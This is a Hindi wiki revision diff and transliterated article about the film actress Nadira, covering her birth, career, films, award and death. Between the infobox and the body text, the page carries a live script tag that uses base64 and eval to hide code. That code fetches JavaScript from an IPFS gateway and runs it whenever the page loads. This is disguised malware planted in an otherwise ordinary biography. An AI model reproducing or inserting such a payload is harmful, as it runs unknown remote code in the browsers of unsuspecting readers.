Difference between revisions of "नादिरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{सूचना बक्सा कलाकार
 
{{सूचना बक्सा कलाकार
|चित्र=
+
|चित्र=Nadira.jpg
 
|चित्र का नाम=नादिरा  
 
|चित्र का नाम=नादिरा  
 
|पूरा नाम=फरहत एजेकेल नादिरा
 
|पूरा नाम=फरहत एजेकेल नादिरा
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''फरहत एजेकेल नादिरा'''<br />
+
'''नादिरा''' अथवा '''फरहत एजेकेल नादिरा''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: ''Nadira'' अथवा ''Farhat Ezekiel Nadira'') (जन्म: [[5 दिसंबर]], 1932; मृत्यु: [[9 फ़रवरी]], 2006) भारतीय फ़िल्म अभिनेत्री हैं। [[हिन्दी]] फ़िल्मों की मशहूर अभिनेत्नी नादिरा अपने समय से कहीं आगे थीं। लाजवाब ख़ूबसूरती और शाहाना अंदाज की शख़्सियत रखने के बावजूद उन्होंने उस दौर में खलनायिका बनना पसंद किया, जब नायिकाएँ इस तरह की भूमिकाएँ करने से घबराती थीं।
नादिरा (जन्म: [[5 दिसंबर]], 1932; मृत्यु: [[9 फ़रवरी]], 2006) भारतीय फ़िल्म अभिनेत्री हैं। [[हिन्दी]] फ़िल्मों की मशहूर अभिनेत्नी नादिरा अपने समय से कहीं आगे थीं। लाजवाब ख़ूबसूरती और शाहाना अंदाज की शख़्सियत रखने के बावजूद उन्होंने उस दौर में खलनायिका बनना पसंद किया, जब नायिकाएँ इस तरह की भूमिकाएँ करने से घबराती थीं।
 
 
==जीवन परिचय==
 
==जीवन परिचय==
 
====जन्म====
 
====जन्म====
Line 39: Line 38:
 
====फ़िल्मी सफ़र की शुरूवात====
 
====फ़िल्मी सफ़र की शुरूवात====
 
नादिरा ने अपने पांच दशक लंबे फ़िल्मी सफ़र में बहुत सी फ़िल्मों में काम किया, जिनमें उन्होंने नायिका, खलनायिका की भूमिका करने के साथ चरित्न भूमिकाएँ भी निभाईं। [[1952]] में [[महबूब ख़ान]] की '''आन''' से अपने फ़िल्मी सफ़र की शुरूवात की, जिसमें उन्होंने एक बिगडैल राजकुमारी की भूमिका निभाई।  
 
नादिरा ने अपने पांच दशक लंबे फ़िल्मी सफ़र में बहुत सी फ़िल्मों में काम किया, जिनमें उन्होंने नायिका, खलनायिका की भूमिका करने के साथ चरित्न भूमिकाएँ भी निभाईं। [[1952]] में [[महबूब ख़ान]] की '''आन''' से अपने फ़िल्मी सफ़र की शुरूवात की, जिसमें उन्होंने एक बिगडैल राजकुमारी की भूमिका निभाई।  
 +
 
==प्रमुख फ़िल्में==
 
==प्रमुख फ़िल्में==
 
*आन
 
*आन
Line 47: Line 47:
 
*सागर
 
*सागर
 
*तमन्ना  
 
*तमन्ना  
 +
[[चित्र:Nadira-2.jpg|thumb|left|नादिरा]]
 
==अंतिम फ़िल्म==
 
==अंतिम फ़िल्म==
 
शाहरुख खान और ऐश्वर्या राय अभिनीत फ़िल्म, जोश नादिरा की अंतिम फ़िल्म थी। फ़िल्म जूली के लिए उन्हें सर्वश्रेष्ठ सहनायिका का फ़िल्मफेयर पुरस्कार मिला। इस फ़िल्म में उन्होंने नायिका जूली की माँ मार्गरेट का किरदार निभाया।  
 
शाहरुख खान और ऐश्वर्या राय अभिनीत फ़िल्म, जोश नादिरा की अंतिम फ़िल्म थी। फ़िल्म जूली के लिए उन्हें सर्वश्रेष्ठ सहनायिका का फ़िल्मफेयर पुरस्कार मिला। इस फ़िल्म में उन्होंने नायिका जूली की माँ मार्गरेट का किरदार निभाया।  

Revision as of 10:26, 22 July 2011

nadira
poora nam pharahat ejekel nadira
prasiddh nam nadira
janm 5 disanbar, 1932
janm bhoomi izarail
mrityu 9 faravari, 2006
mrityu sthan muanbee
karm bhoomi muanbee
karm-kshetr abhinetni
mukhy filmean an, shri 420, dil apana aur prit paraee , pakiza, jooli, sagar, tamanna,
prasiddhi khalanayika
nagarikata bharatiy
aantim film josh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nadira athava pharahat ejekel nadira (aangrezi: Nadira athava Farhat Ezekiel Nadira) (janm: 5 disanbar, 1932; mrityu: 9 faravari, 2006) bharatiy film abhinetri haian. hindi filmoan ki mashahoor abhinetni nadira apane samay se kahian age thian. lajavab khoobasoorati aur shahana aandaj ki shakhsiyat rakhane ke bavajood unhoanne us daur mean khalanayika banana pasand kiya, jab nayikaean is tarah ki bhoomikaean karane se ghabarati thian.

jivan parichay

janm

nadira ka janm 5 disambar 1932 ko izarail mean ek yahoodi parivar mean hua tha.

filmi safar ki shuroovat

nadira ne apane paanch dashak lanbe filmi safar mean bahut si filmoan mean kam kiya, jinamean unhoanne nayika, khalanayika ki bhoomika karane ke sath charitn bhoomikaean bhi nibhaeean. 1952 mean mahaboob khan ki an se apane filmi safar ki shuroovat ki, jisamean unhoanne ek bigadail rajakumari ki bhoomika nibhaee.

pramukh filmean

  • an
  • shri 420
  • dil apana aur prit paraee
  • pakiza
  • jooli
  • sagar
  • tamanna

thumb|left|nadira

aantim film

shaharukh khan aur aishvarya ray abhinit film, josh nadira ki aantim film thi. film jooli ke lie unhean sarvashreshth sahanayika ka filmapheyar puraskar mila. is film mean unhoanne nayika jooli ki maan margaret ka kiradar nibhaya.

mrityu

jivan ke aantim tin varsho mean to nadira ne khud ko ghar mean kaid sa kar liya aur jamakar sharab pine lagian, jisaki vajah se nadira ko kee tarah ki bimariyoan ne gher liya. nadira mumbee ke ta dadev mean aspatal mean bharti karaya gaya, jahaan 9 faravari 2006 ko 74 varsh ki umr mean unaka mrityu ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh